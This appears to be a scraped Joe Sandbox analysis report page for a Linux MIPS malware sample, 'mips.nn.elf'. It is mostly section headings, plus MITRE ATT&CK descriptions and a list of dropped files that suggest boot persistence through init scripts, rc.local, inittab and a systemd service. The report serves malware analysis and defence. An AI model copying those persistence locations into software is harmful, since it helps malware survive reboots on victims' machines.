Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mips.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/mips.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.EgVH5u (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: dash PID: 5475, Parent PID: 3634

General

Chronological Activities

Analysis Process: rm PID: 5475, Parent PID: 3634

General

Chronological Activities

Analysis Process: dash PID: 5476, Parent PID: 3634

Linux Analysis Report
mips.nn.elf